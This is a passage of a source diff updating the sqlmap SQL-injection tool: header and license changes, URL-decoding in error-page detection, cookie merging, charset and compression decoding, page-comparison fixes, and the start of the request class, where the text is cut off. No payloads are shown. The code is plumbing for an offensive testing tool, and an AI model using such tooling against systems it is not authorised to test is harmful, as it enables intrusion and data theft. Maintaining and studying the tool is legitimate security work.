See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|
||||||
from xml.sax.handler import ContentHandler
|
from xml.sax.handler import ContentHandler
|
||||||
|
|
||||||
|
from lib.core.common import urldecode
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
@@ -26,6 +27,7 @@ class HTMLHandler(ContentHandler):
|
|||||||
self._dbms = None
|
self._dbms = None
|
||||||
self._page = (page or "")
|
self._page = (page or "")
|
||||||
self._lower_page = self._page.lower()
|
self._lower_page = self._page.lower()
|
||||||
|
self._urldecoded_page = urldecode(self._page)
|
||||||
|
|
||||||
self.dbms = None
|
self.dbms = None
|
||||||
|
|
||||||
@@ -43,11 +45,11 @@ class HTMLHandler(ContentHandler):
|
|||||||
elif name == "error":
|
elif name == "error":
|
||||||
regexp = attrs.get("regexp")
|
regexp = attrs.get("regexp")
|
||||||
if regexp not in kb.cache.regex:
|
if regexp not in kb.cache.regex:
|
||||||
keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
|
keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp))
|
||||||
keywords = sorted(keywords, key=len)
|
keywords = sorted(keywords, key=len)
|
||||||
kb.cache.regex[regexp] = keywords[-1].lower()
|
kb.cache.regex[regexp] = keywords[-1].lower()
|
||||||
|
|
||||||
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
|
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._urldecoded_page, re.I):
|
||||||
self.dbms = self._dbms
|
self.dbms = self._dbms
|
||||||
self._markAsErrorPage()
|
self._markAsErrorPage()
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -36,7 +36,7 @@ def cleanupVals(text, tag):
|
|||||||
return text
|
return text
|
||||||
|
|
||||||
def parseXmlNode(node):
|
def parseXmlNode(node):
|
||||||
for element in node.getiterator('boundary'):
|
for element in node.getiterator("boundary"):
|
||||||
boundary = AttribDict()
|
boundary = AttribDict()
|
||||||
|
|
||||||
for child in element.getchildren():
|
for child in element.getchildren():
|
||||||
@@ -48,7 +48,7 @@ def parseXmlNode(node):
|
|||||||
|
|
||||||
conf.boundaries.append(boundary)
|
conf.boundaries.append(boundary)
|
||||||
|
|
||||||
for element in node.getiterator('test'):
|
for element in node.getiterator("test"):
|
||||||
test = AttribDict()
|
test = AttribDict()
|
||||||
|
|
||||||
for child in element.getchildren():
|
for child in element.getchildren():
|
||||||
@@ -78,7 +78,7 @@ def loadBoundaries():
|
|||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
|
|
||||||
root = doc.getroot()
|
root = doc.getroot()
|
||||||
parseXmlNode(root)
|
parseXmlNode(root)
|
||||||
@@ -93,7 +93,7 @@ def loadPayloads():
|
|||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
|
|
||||||
root = doc.getroot()
|
root = doc.getroot()
|
||||||
parseXmlNode(root)
|
parseXmlNode(root)
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import httplib
|
import httplib
|
||||||
@@ -32,7 +32,7 @@ def parseSitemap(url, retVal=None):
|
|||||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||||
except httplib.InvalidURL:
|
except httplib.InvalidURL:
|
||||||
errMsg = "invalid URL given for sitemap ('%s')" % url
|
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||||
raise SqlmapSyntaxException, errMsg
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||||
if abortedFlag:
|
if abortedFlag:
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
@@ -18,11 +18,13 @@ from lib.core.common import extractErrorMessage
|
|||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import getPublicTypeMembers
|
from lib.core.common import getPublicTypeMembers
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.common import isListLike
|
||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import resetCookieJar
|
from lib.core.common import resetCookieJar
|
||||||
from lib.core.common import singleTimeLogMessage
|
from lib.core.common import singleTimeLogMessage
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
|
from lib.core.common import unArrayizeValue
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
@@ -46,7 +48,7 @@ from lib.utils.htmlentities import htmlEntities
|
|||||||
from thirdparty.chardet import detect
|
from thirdparty.chardet import detect
|
||||||
from thirdparty.odict.odict import OrderedDict
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
|
||||||
def forgeHeaders(items=None):
|
def forgeHeaders(items=None, base=None):
|
||||||
"""
|
"""
|
||||||
Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing
|
Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing
|
||||||
the HTTP requests
|
the HTTP requests
|
||||||
@@ -58,7 +60,7 @@ def forgeHeaders(items=None):
|
|||||||
if items[_] is None:
|
if items[_] is None:
|
||||||
del items[_]
|
del items[_]
|
||||||
|
|
||||||
headers = OrderedDict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders if base is None else base)
|
||||||
headers.update(items.items())
|
headers.update(items.items())
|
||||||
|
|
||||||
class _str(str):
|
class _str(str):
|
||||||
@@ -92,7 +94,7 @@ def forgeHeaders(items=None):
|
|||||||
if conf.cj:
|
if conf.cj:
|
||||||
if HTTP_HEADER.COOKIE in headers:
|
if HTTP_HEADER.COOKIE in headers:
|
||||||
for cookie in conf.cj:
|
for cookie in conf.cj:
|
||||||
if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
|
if cookie.domain_specified and not (conf.hostname or "").endswith(cookie.domain):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):
|
if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):
|
||||||
@@ -107,7 +109,9 @@ def forgeHeaders(items=None):
|
|||||||
kb.mergeCookies = readInput(message, default='Y', boolean=True)
|
kb.mergeCookies = readInput(message, default='Y', boolean=True)
|
||||||
|
|
||||||
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
||||||
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
|
def _(value):
|
||||||
|
return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)
|
||||||
|
|
||||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||||
|
|
||||||
if PLACE.COOKIE in conf.parameters:
|
if PLACE.COOKIE in conf.parameters:
|
||||||
@@ -149,13 +153,16 @@ def checkCharEncoding(encoding, warn=True):
|
|||||||
'utf8'
|
'utf8'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
if isListLike(encoding):
|
||||||
|
encoding = unArrayizeValue(encoding)
|
||||||
|
|
||||||
if encoding:
|
if encoding:
|
||||||
encoding = encoding.lower()
|
encoding = encoding.lower()
|
||||||
else:
|
else:
|
||||||
return encoding
|
return encoding
|
||||||
|
|
||||||
# Reference: http://www.destructor.de/charsets/index.htm
|
# Reference: http://www.destructor.de/charsets/index.htm
|
||||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||||
|
|
||||||
for delimiter in (';', ',', '('):
|
for delimiter in (';', ',', '('):
|
||||||
if delimiter in encoding:
|
if delimiter in encoding:
|
||||||
@@ -212,10 +219,6 @@ def checkCharEncoding(encoding, warn=True):
|
|||||||
try:
|
try:
|
||||||
codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
|
codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
|
||||||
except (LookupError, ValueError):
|
except (LookupError, ValueError):
|
||||||
if warn:
|
|
||||||
warnMsg = "unknown web page charset '%s'. " % encoding
|
|
||||||
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
|
|
||||||
singleTimeLogMessage(warnMsg, logging.WARN, encoding)
|
|
||||||
encoding = None
|
encoding = None
|
||||||
|
|
||||||
if encoding:
|
if encoding:
|
||||||
@@ -253,12 +256,22 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
if not page or (conf.nullConnection and len(page) < 2):
|
if not page or (conf.nullConnection and len(page) < 2):
|
||||||
return getUnicode(page)
|
return getUnicode(page)
|
||||||
|
|
||||||
if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"):
|
if isinstance(contentEncoding, basestring) and contentEncoding:
|
||||||
|
contentEncoding = contentEncoding.lower()
|
||||||
|
else:
|
||||||
|
contentEncoding = ""
|
||||||
|
|
||||||
|
if isinstance(contentType, basestring) and contentType:
|
||||||
|
contentType = contentType.lower()
|
||||||
|
else:
|
||||||
|
contentType = ""
|
||||||
|
|
||||||
|
if contentEncoding in ("gzip", "x-gzip", "deflate"):
|
||||||
if not kb.pageCompress:
|
if not kb.pageCompress:
|
||||||
return None
|
return None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if contentEncoding.lower() == "deflate":
|
if contentEncoding == "deflate":
|
||||||
data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
|
data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
|
||||||
else:
|
else:
|
||||||
data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page))
|
data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page))
|
||||||
@@ -279,27 +292,26 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
kb.pageCompress = False
|
kb.pageCompress = False
|
||||||
raise SqlmapCompressionException
|
raise SqlmapCompressionException
|
||||||
|
|
||||||
if not conf.charset:
|
if not conf.encoding:
|
||||||
httpCharset, metaCharset = None, None
|
httpCharset, metaCharset = None, None
|
||||||
|
|
||||||
# Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode
|
# Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode
|
||||||
if contentType and (contentType.find("charset=") != -1):
|
if contentType.find("charset=") != -1:
|
||||||
httpCharset = checkCharEncoding(contentType.split("charset=")[-1])
|
httpCharset = checkCharEncoding(contentType.split("charset=")[-1])
|
||||||
|
|
||||||
metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))
|
metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))
|
||||||
|
|
||||||
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
|
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset))) or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
||||||
or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
|
||||||
kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
|
kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
|
||||||
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
||||||
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
||||||
else:
|
else:
|
||||||
kb.pageEncoding = None
|
kb.pageEncoding = None
|
||||||
else:
|
else:
|
||||||
kb.pageEncoding = conf.charset
|
kb.pageEncoding = conf.encoding
|
||||||
|
|
||||||
# can't do for all responses because we need to support binary files too
|
# can't do for all responses because we need to support binary files too
|
||||||
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
if not isinstance(page, unicode) and "text/" in contentType:
|
||||||
if kb.heuristicMode:
|
if kb.heuristicMode:
|
||||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||||
page = getUnicode(page, kb.pageEncoding)
|
page = getUnicode(page, kb.pageEncoding)
|
||||||
@@ -317,7 +329,7 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
|
|
||||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||||
|
|
||||||
if kb.pageEncoding and kb.pageEncoding.lower() == "utf-8-sig":
|
if (kb.pageEncoding or "").lower() == "utf-8-sig":
|
||||||
kb.pageEncoding = "utf-8"
|
kb.pageEncoding = "utf-8"
|
||||||
if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
|
if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
|
||||||
page = page[3:]
|
page = page[3:]
|
||||||
@@ -373,7 +385,7 @@ def processResponse(page, responseHeaders, status=None):
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
conf.paramDict[PLACE.POST][name] = value
|
conf.paramDict[PLACE.POST][name] = value
|
||||||
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
|
conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST])
|
||||||
|
|
||||||
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
||||||
kb.browserVerification = True
|
kb.browserVerification = True
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import urllib2
|
import urllib2
|
||||||
@@ -30,10 +30,8 @@ class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
|
|||||||
self.retried_count = 0
|
self.retried_count = 0
|
||||||
else:
|
else:
|
||||||
if self.retried_count > 5:
|
if self.retried_count > 5:
|
||||||
raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed",
|
raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None)
|
||||||
headers, None)
|
|
||||||
else:
|
else:
|
||||||
self.retried_count += 1
|
self.retried_count += 1
|
||||||
|
|
||||||
return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
|
return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers)
|
||||||
self, auth_header, host, req, headers)
|
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@@ -49,7 +49,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
|
|
||||||
if kb.testMode:
|
if kb.testMode:
|
||||||
threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else ""
|
threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else ""
|
||||||
threadData.lastComparisonPage = page
|
threadData.lastComparisonPage = page
|
||||||
threadData.lastComparisonCode = code
|
threadData.lastComparisonCode = code
|
||||||
|
|
||||||
@@ -57,7 +57,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
if any((conf.string, conf.notString, conf.regexp)):
|
if any((conf.string, conf.notString, conf.regexp)):
|
||||||
rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page)
|
rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page)
|
||||||
|
|
||||||
# String to match in page when the query is True and/or valid
|
# String to match in page when the query is True and/or valid
|
||||||
if conf.string:
|
if conf.string:
|
||||||
@@ -106,16 +106,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||||||
# Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
|
# Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
|
||||||
# (e.g. if one page is PDF and the other is HTML)
|
# (e.g. if one page is PDF and the other is HTML)
|
||||||
if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
|
if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
|
||||||
page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
|
page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
|
||||||
elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
|
elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
|
||||||
seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
|
seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
|
||||||
|
|
||||||
if seqMatcher.a and page and seqMatcher.a == page:
|
if any(_ is None for _ in (page, seqMatcher.a)):
|
||||||
ratio = 1
|
return None
|
||||||
|
elif seqMatcher.a and page and seqMatcher.a == page:
|
||||||
|
ratio = 1.
|
||||||
elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
|
elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
|
||||||
ratio = 1.0 * len(seqMatcher.a) / len(page)
|
if not page or not seqMatcher.a:
|
||||||
if ratio > 1:
|
return float(seqMatcher.a == page)
|
||||||
ratio = 1. / ratio
|
else:
|
||||||
|
ratio = 1. * len(seqMatcher.a) / len(page)
|
||||||
|
if ratio > 1:
|
||||||
|
ratio = 1. / ratio
|
||||||
else:
|
else:
|
||||||
seq1, seq2 = None, None
|
seq1, seq2 = None, None
|
||||||
|
|
||||||
|
|||||||
@@ -1,14 +1,13 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import binascii
|
import binascii
|
||||||
import compiler
|
import compiler
|
||||||
import httplib
|
import httplib
|
||||||
import json
|
|
||||||
import keyword
|
import keyword
|
||||||
import logging
|
import logging
|
||||||
import re
|
import re
|
||||||
@@ -34,6 +33,7 @@ from lib.core.common import calculateDeltaSeconds
|
|||||||
from lib.core.common import checkSameHost
|
from lib.core.common import checkSameHost
|
||||||
from lib.core.common import clearConsoleLine
|
from lib.core.common import clearConsoleLine
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
|
from lib.core.common import escapeJsonValue
|
||||||
from lib.core.common import evaluateCode
|
from lib.core.common import evaluateCode
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import findMultipartPostBoundary
|
from lib.core.common import findMultipartPostBoundary
|
||||||
@@ -51,16 +51,19 @@ from lib.core.common import randomInt
|
|||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import removeReflectiveValues
|
from lib.core.common import removeReflectiveValues
|
||||||
|
from lib.core.common import safeVariableNaming
|
||||||
from lib.core.common import singleTimeLogMessage
|
from lib.core.common import singleTimeLogMessage
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
from lib.core.common import stdev
|
from lib.core.common import stdev
|
||||||
from lib.core.common import wasLastResponseDelayed
|
from lib.core.common import wasLastResponseDelayed
|
||||||
from lib.core.common import unicodeencode
|
from lib.core.common import unicodeencode
|
||||||
|
from lib.core.common import unsafeVariableNaming
|
||||||
from lib.core.common import urldecode
|
from lib.core.common import urldecode
|
||||||
from lib.core.common import urlencode
|
from lib.core.common import urlencode
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.dicts import POST_HINT_CONTENT_TYPES
|
from lib.core.dicts import POST_HINT_CONTENT_TYPES
|
||||||
from lib.core.enums import ADJUST_TIME_DELAY
|
from lib.core.enums import ADJUST_TIME_DELAY
|
||||||
from lib.core.enums import AUTH_TYPE
|
from lib.core.enums import AUTH_TYPE
|
||||||
@@ -116,7 +119,6 @@ from lib.request.methodrequest import MethodRequest
|
|||||||
from thirdparty.odict.odict import OrderedDict
|
from thirdparty.odict.odict import OrderedDict
|
||||||
from thirdparty.socks.socks import ProxyError
|
from thirdparty.socks.socks import ProxyError
|
||||||
|
|
||||||
|
|
||||||
class Connect(object):
|
class Connect(object):
|
||||||
"""
|
"""
|
||||||
This class defines methods used to perform HTTP requests
|
This class defines methods used to perform HTTP requests
|
||||||
@@ -185,13 +187,13 @@ class Connect(object):
|
|||||||
|
|
||||||
if not kb.dnsMode and conn:
|
if not kb.dnsMode and conn:
|
||||||
headers = conn.info()
|
headers = conn.info()
|
||||||
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||||
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
|
||||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||||
warnMsg = "large compressed response detected. Disabling compression"
|
warnMsg = "large compressed response detected. Disabling compression"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
kb.pageCompress = False
|
kb.pageCompress = False
|
||||||
|
raise SqlmapCompressionException
|
||||||
else:
|
else:
|
||||||
while True:
|
while True:
|
||||||
if not conn:
|
if not conn:
|
||||||
@@ -239,27 +241,27 @@ class Connect(object):
|
|||||||
kb.requestCounter += 1
|
kb.requestCounter += 1
|
||||||
threadData.lastRequestUID = kb.requestCounter
|
threadData.lastRequestUID = kb.requestCounter
|
||||||
|
|
||||||
url = kwargs.get("url", None) or conf.url
|
url = kwargs.get("url", None) or conf.url
|
||||||
get = kwargs.get("get", None)
|
get = kwargs.get("get", None)
|
||||||
post = kwargs.get("post", None)
|
post = kwargs.get("post", None)
|
||||||
method = kwargs.get("method", None)
|
method = kwargs.get("method", None)
|
||||||
cookie = kwargs.get("cookie", None)
|
cookie = kwargs.get("cookie", None)
|
||||||
ua = kwargs.get("ua", None) or conf.agent
|
ua = kwargs.get("ua", None) or conf.agent
|
||||||
referer = kwargs.get("referer", None) or conf.referer
|
referer = kwargs.get("referer", None) or conf.referer
|
||||||
host = kwargs.get("host", None) or conf.host
|
host = kwargs.get("host", None) or conf.host
|
||||||
direct_ = kwargs.get("direct", False)
|
direct_ = kwargs.get("direct", False)
|
||||||
multipart = kwargs.get("multipart", None)
|
multipart = kwargs.get("multipart", None)
|
||||||
silent = kwargs.get("silent", False)
|
silent = kwargs.get("silent", False)
|
||||||
raise404 = kwargs.get("raise404", True)
|
raise404 = kwargs.get("raise404", True)
|
||||||
timeout = kwargs.get("timeout", None) or conf.timeout
|
timeout = kwargs.get("timeout", None) or conf.timeout
|
||||||
auxHeaders = kwargs.get("auxHeaders", None)
|
auxHeaders = kwargs.get("auxHeaders", None)
|
||||||
response = kwargs.get("response", False)
|
